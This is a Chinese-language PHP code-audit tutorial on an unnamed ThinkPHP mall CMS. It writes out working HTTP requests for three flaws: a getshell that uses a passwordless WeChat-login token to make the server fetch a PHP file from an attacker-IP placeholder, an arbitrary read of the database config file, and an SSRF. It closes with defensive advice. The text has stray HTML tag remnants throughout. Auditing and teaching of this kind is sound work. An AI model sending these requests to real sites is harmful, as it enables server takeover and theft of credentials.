PHP代码审计实战：商城CMS漏洞挖掘与分析<\/h1>

0x00 前言与基础知识<\/h2>

学习前提<\/h3>

熟悉PHP语法基础<\/li>
了解MVC架构模式（Model-View-Controller）<\/li>
掌握SQL预编译技术<\/li>

了解常见危险函数及其风险<\/li> <\/ul>

审计方法<\/h3>

黑盒测试<\/strong>：通过AWVS等扫描工具进行漏洞扫描<\/li>

白盒审计<\/strong>：通过搜索危险函数寻找漏洞点<\/li> <\/ol>
0x01 环境说明<\/h2>

Web服务器：Apache 2.4.46<\/li>
数据库：MySQL 5.7.34<\/li>
PHP版本：7.4.21<\/li>
框架：ThinkPHP 5.0.24<\/li> <\/ul>
0x02 漏洞挖掘：远程文件上传Getshell<\/h2>
1. 发现危险函数<\/h3>
通过全局搜索fopen<\/code>函数，在api目录下发现download_img<\/code>函数：<\/p>
function<\/span> download_img<\/span>($url, $path) { <\/span><\/span> \/\/ 直接使用curl访问提供的url <\/span><\/span><\/span><\/span> \/\/ path变量未做任何过滤 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>风险点<\/strong>：<\/p> url<\/code>和path<\/code>参数完全可控<\/li> 无任何过滤措施<\/li> <\/ul> 2. Token获取分析<\/h3> 伪造Token思路<\/h4> 跟踪Token生成逻辑：位于app\common\logic\TokenLogic.php<\/code><\/li> Token格式：$type-$user_id-microtime<\/code><\/li> 校验方式：数据库查询验证<\/li> <\/ul> <\/li> <\/ol> 结论<\/strong>：无法直接伪造，必须通过合法途径获取<\/p> 间接获取Token方法<\/h4> 发现wxLogin<\/code>函数提供无密码登录方式：<\/p> function<\/span> wxLogin<\/span>() { <\/span><\/span> \/\/ 用户不存在时可创建新用户 <\/span><\/span><\/span><\/span> \/\/ 通过后会生成新token <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> POST<\/span> \/api\/login\/wx_login HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>openid=1&unionid=1&sex=1&head_img=1&nickname=1 <\/span><\/span><\/code><\/pre>3. 漏洞复现步骤<\/h3> 获取Token<\/strong>：<\/p> 通过wx_login接口获取有效token<\/li> <\/ul> <\/li> 准备恶意文件<\/strong>：<\/p> echo '<?php phpinfo();'<\/span> > index.php <\/span><\/span>python -m http.server 8099<\/span> <\/span><\/span><\/code><\/pre><\/li> 执行文件上传<\/strong>：<\/p> POST<\/span> \/api\/User\/download_img HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>access_token=获取的token&url=http:\/\/攻击者IP:8099\/index.php&path=info.php <\/span><\/span><\/code><\/pre><\/li> 验证<\/strong>：<\/p> 访问http:\/\/target.com\/info.php<\/code>确认文件上传成功<\/li> <\/ul> <\/li> <\/ol> 0x03 漏洞挖掘：任意文件读取<\/h2> 1. 漏洞分析<\/h3> 发现file_get_contents<\/code>危险函数使用：<\/p> function<\/span> getFileBinary<\/span>() { <\/span><\/span> $file =<\/span> file_get_contents<\/span>($_POST['url'<\/span>]); <\/span><\/span> return<\/span> base64_encode<\/span>(chunk_split<\/span>($file)); <\/span><\/span>} <\/span><\/span><\/code><\/pre>风险点<\/strong>：<\/p> url<\/code>参数完全可控<\/li> 无任何路径限制或过滤<\/li> 可读取服务器任意文件<\/li> <\/ul> 2. 漏洞复现<\/h3> POST<\/span> \/api\/Index\/getFileBinary HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>url=..\/application\/database.php <\/span><\/span><\/code><\/pre>数据处理<\/strong>：<\/p> 获取base64编码响应<\/li> 去除\r\n<\/code>换行符： a<\/span>.replaceAll<\/span>('\r\n'<\/span>, ''<\/span>) <\/span><\/span><\/code><\/pre><\/li> 解码获取原始文件内容<\/li> <\/ol> 扩展利用<\/strong>：<\/p> 可作为有回显的SSRF使用<\/li> 可读取内网服务信息<\/li> <\/ul> 0x04 漏洞挖掘：SSRF漏洞<\/h2> 1. 漏洞分析<\/h3> 发现curl_exec<\/code>危险函数使用：<\/p> function<\/span> curl_upload_image<\/span>() { <\/span><\/span> \/\/ url参数可控 <\/span><\/span><\/span><\/span> \/\/ 可发起任意HTTP请求 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>风险点<\/strong>：<\/p> url<\/code>参数完全可控<\/li> 无协议限制或内网防护<\/li> <\/ul> 2. 漏洞复现<\/h3> POST<\/span> \/api\/Image\/curl_upload_image HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>url=http:\/\/127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1 <\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p> 无回显SSRF<\/li> 可探测内网服务<\/li> <\/ul> 0x05 总结与防御建议<\/h2> 漏洞共性<\/h3> 用户输入未经验证直接使用<\/li> 危险函数无防护措施<\/li> 权限校验不完善<\/li> <\/ol> 防御建议<\/h3> 文件操作安全<\/strong>：<\/p> 限制文件操作目录<\/li> 验证文件路径合法性<\/li> 禁用危险函数或严格过滤参数<\/li> <\/ul> <\/li> 认证安全<\/strong>：<\/p> Token应使用强加密算法<\/li> 避免提供无密码登录方式<\/li> 实现完善的权限控制系统<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> \/\/ 示例：安全文件路径检查 <\/span><\/span><\/span><\/span>function<\/span> safe_path<\/span>($path) { <\/span><\/span> $realpath =<\/span> realpath<\/span>($path); <\/span><\/span> if<\/span>(strpos<\/span>($realpath, '\/allowed\/dir\/'<\/span>) !==<\/span> 0<\/span>) { <\/span><\/span> die<\/span>('Invalid path'<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> $realpath; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> SSRF防护<\/strong>：<\/p> 禁用非常用协议（如file:\/\/, gopher:\/\/等）<\/li> 过滤内网IP请求<\/li> 使用白名单域名限制<\/li> <\/ul> <\/li> 日志监控<\/strong>：<\/p> 记录所有文件操作<\/li> 监控异常请求模式<\/li> <\/ul> <\/li> <\/ol> 附录：危险函数列表<\/h2> 函数名<\/th> 风险类型<\/th> 安全建议<\/th> <\/tr> <\/thead> fopen<\/td> 文件操作<\/td> 限制路径，验证参数<\/td> <\/tr> file_get_contents<\/td> 文件读取\/SSRF<\/td> 严格过滤输入<\/td> <\/tr> curl_exec<\/td> SSRF<\/td> 限制目标URL<\/td> <\/tr> system\/exec<\/td> 命令注入<\/td> 避免使用或严格过滤<\/td> <\/tr> unserialize<\/td> 反序列化<\/td> 避免使用不可信数据<\/td> <\/tr> <\/tbody> <\/table>

函数名<\/th>	风险类型<\/th>	安全建议<\/th> <\/tr> <\/thead>
fopen<\/td>	文件操作<\/td>	限制路径，验证参数<\/td> <\/tr>
file_get_contents<\/td>	文件读取\/SSRF<\/td>	严格过滤输入<\/td> <\/tr>
curl_exec<\/td>	SSRF<\/td>	限制目标URL<\/td> <\/tr>
system\/exec<\/td>	命令注入<\/td>	避免使用或严格过滤<\/td> <\/tr>
unserialize<\/td>	反序列化<\/td>	避免使用不可信数据<\/td> <\/tr> <\/tbody> <\/table>